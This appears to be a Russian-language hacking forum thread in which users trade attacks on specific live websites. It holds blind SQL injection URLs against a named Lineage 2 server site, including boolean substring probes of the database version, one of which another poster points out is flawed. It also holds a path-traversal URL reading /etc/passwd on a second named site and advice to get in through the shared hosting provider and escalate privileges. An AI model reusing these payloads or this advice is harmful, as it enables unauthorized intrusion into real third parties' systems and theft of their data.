Собственно нашел одну инъекцию: _http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')%20and%201=2-- _http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')%20and%201=1-- Юнион селект не хочет делать, через ; тоже не получается. Есть ли возможность исполнять команды типа update или возможность сделать select? Заранее спасибо.
читай http://rst.void.ru/papers/mysql_char_brute.txt подбирай и перебирай через substring.. http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(substring(@@version,1,1))>100)-- http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(substring(@@version,1,1))>1)-- http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(substring('select+top+1+from+information_schema.tables',1,1))>120)-- http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(substring('select+top+1+from+information_schema.tables',1,1))>1)--
update никак не получится сделать? кстати в выражении http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(substring('select+top+1+from+in formation_schema.tables',1,1))>1)-- нет смысла, так как селект не вычисляется - ты задал его в виде строковой константы. То есть substring('select+top+1+from+information_schema.tables',1,100) = 'select+top+1+from+information_schema.tables'
http://la2shop.net/index.php?val=../../../../../../etc/passwd На том же ip см. титли. Вообще 1gb.ru дырявый до ужоса там винда права поднять банально ломай через хостинг
